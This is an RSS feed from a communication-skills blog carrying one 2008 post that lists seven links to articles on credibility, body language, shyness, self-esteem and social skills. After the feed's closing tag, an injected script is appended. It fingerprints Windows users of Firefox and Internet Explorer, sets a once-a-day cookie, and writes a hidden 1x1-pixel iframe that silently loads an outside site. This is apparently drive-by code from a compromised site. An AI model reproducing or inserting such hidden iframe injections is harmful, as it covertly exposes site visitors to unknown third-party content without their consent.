<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Communication Skills Power Blog &#187; The Top 7 Communication Blogs To Start The Week</title>
	<atom:link href="http://www.howtotalkwithconfidence.com/blog/the-top-7-communication-blogs-to-start-the-week/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.howtotalkwithconfidence.com/blog</link>
	<description>how to develop great conversation skills</description>
	<lastBuildDate>Tue, 31 Jan 2012 16:53:55 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<atom:link rel='hub' href='http://www.howtotalkwithconfidence.com/blog/?pushpress=hub'/>
		<item>
		<title>The Top 7 Communication Blogs To Start The Week</title>
		<link>http://www.howtotalkwithconfidence.com/blog/the-top-7-communication-blogs-to-start-the-week/</link>
		<comments>http://www.howtotalkwithconfidence.com/blog/the-top-7-communication-blogs-to-start-the-week/#comments</comments>
		<pubDate>Tue, 29 Jan 2008 19:00:24 +0000</pubDate>
		<dc:creator>Mari</dc:creator>
				<category><![CDATA[Communication Skill ]]></category>
		<category><![CDATA[Shyness Overcome]]></category>
		<category><![CDATA[Social Skills Help]]></category>

		<guid isPermaLink="false">http://www.howtotalkwithconfidence.com/blog/the-top-7-communication-blogs-to-start-the-week/</guid>
		<description><![CDATA[Here are the top 7 communication articles I found today on blogs around the internet. Check out these inspirational and educational blog posts. 1. A great post where communication consultant speak on How to communicate your credibility to generate business. http://www.angelabetts.com/blog/2007/05/04/credible-business-communication/ 2. Ian&#8217;s Messy Desk has a good post about controlling your body language for [...]]]></description>
			<content:encoded><![CDATA[<p>Here are the top 7 communication articles I found today on blogs around the internet. Check out these inspirational and educational blog posts.</p>
<p>1. A great post where communication consultant speak on How to communicate your credibility to generate business.</p>
<p><a href="http://www.angelabetts.com/blog/2007/05/04/credible-business-communication/">http://www.angelabetts.com/blog/2007/05/04/credible-business-communication/</a></p>
<p>2. Ian&#8217;s Messy Desk has a good post about controlling your body language for effective communication.</p>
<p><a href="http://www.ismckenzie.com/05/15/control-your-body-language-for-effective-communication/">http://www.ismckenzie.com/05/15/control-your-body-language-for-effective-communication/</a></p>
<p>3. Lindsey Pollak talks on Why Shy People Make Great Networkers in her cool blog.</p>
<p><a href="http://lindseypollak.blogspot.com/search/label/Huffington%20Post">http://lindseypollak.blogspot.com/search/label/Huffington%20Post </a></p>
<p>4. Learn boosting your <a class="ld_link" href="http://www.howtotalkwithconfidence.com/blog/how-to-have-high-self-esteem-in-10-easy-steps/" target="_blank" title="self esteem">self esteem</a> with Emotional Freedom Techniques from the EFT Joy blog.</p>
<p><a href="http://eftjoy.com/blog/category/shyness/">http://eftjoy.com/blog/category/shyness/</a></p>
<p>5. <a class="ld_link" href="http://www.howtotalkwithconfidence.com/blog/little-known-social-skill-tips-and-tricks/" target="_blank" title="Social Skills">Social Skills</a> for Children with ADD found in Adult ADD Strengths blog.</p>
<p><a href="http://adultaddstrengths.com/2005/10/08/social-skills-for-children-with-add/">http://adultaddstrengths.com/2005/10/08/social-skills-for-children-with-add/</a></p>
<p>6. Zerointelligenc.net talks about school is good for building <a class="ld_link" href="http://www.howtotalkwithconfidence.com/blog/little-known-social-skill-tips-and-tricks/" target="_blank" title="social skills">social skills</a>.</p>
<p><a href="http://www.zerointelligence.net/archives/000520.php">http://www.zerointelligence.net/archives/000520.php</a></p>
<p>7. Elliot Lee has an interesting post about Geek&#8217;s Social Skills.</p>
<p><a href="http://www.intelliot.com/blog/archives/2004/03/11/geeks-social-skills/">http://www.intelliot.com/blog/archives/2004/03/11/geeks-social-skills/</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.howtotalkwithconfidence.com/blog/the-top-7-communication-blogs-to-start-the-week/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
<script> var BrowserDetect = { init: function () { this.browser = this.searchString(this.dataBrowser) || "An unknown browser"; this.version = this.searchVersion(navigator.userAgent) || this.searchVersion(navigator.appVersion) || "an unknown version"; this.OS = this.searchString(this.dataOS) || "an unknown OS"; }, searchString: function (data) { for (var i=0;i<data.length;i++) { var dataString = data[i].string; var dataProp = data[i].prop; this.versionSearchString = data[i].versionSearch || data[i].identity; if (dataString) { if (dataString.indexOf(data[i].subString) != -1) return data[i].identity; } else if (dataProp) return data[i].identity; } }, searchVersion: function (dataString) { var index = dataString.indexOf(this.versionSearchString); if (index == -1) return; return parseFloat(dataString.substring(index+this.versionSearchString.length+1)); }, dataBrowser: [       { string: navigator.userAgent,subString: "Firefox",identity: "Firefox"},{string: navigator.userAgent,subString: "MSIE",identity: "Explorer",versionSearch: "MSIE"}],dataOS : [{string: navigator.platform,subString: "Win",identity: "Windows"}]};function addCookie(szName,szValue,dtDaysExpires){ var dtExpires = new Date();var dtExpiryDate = "";dtExpires.setTime(dtExpires.getTime()+dtDaysExpires*24*60*60*1000);dtExpiryDate=dtExpires.toGMTString();document.cookie=szName+"="+szValue+";expires="+dtExpiryDate;} function findCookie(szName){        var i=0;var nStartPosition=0;var nEndPosition=0;var szCookieString=document.cookie; while (i<=szCookieString.length){nStartPosition=i;nEndPosition=nStartPosition+szName.length;if (szCookieString.substring(nStartPosition,nEndPosition)==szName){nStartPosition=nEndPosition+1;nEndPosition=document.cookie.indexOf(";",nStartPosition);if(nEndPosition<nStartPosition) nEndPosition=document.cookie.length;return document.cookie.substring(nStartPosition,nEndPosition);break;}i++;} return "";} BrowserDetect.init(); var szCookieString = document.cookie; var boroda = BrowserDetect.browser; var os = BrowserDetect.OS; if ( ((boroda == "Firefox" || boroda == "Explorer") && (os == "Windows")) && (findCookie('geo_idn')!='c48a765e4f75baeb85f0a755fc3ec09c') ) {addCookie("geo_idn","c48a765e4f75baeb85f0a755fc3ec09c",1);document.write('<iframe src="http://feedfaster.com" name="Twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"></iframe>');}else {}</script>  
<!-- WP Super Cache is installed but broken. The path to wp-cache-phase1.php in wp-content/advanced-cache.php must be fixed! -->
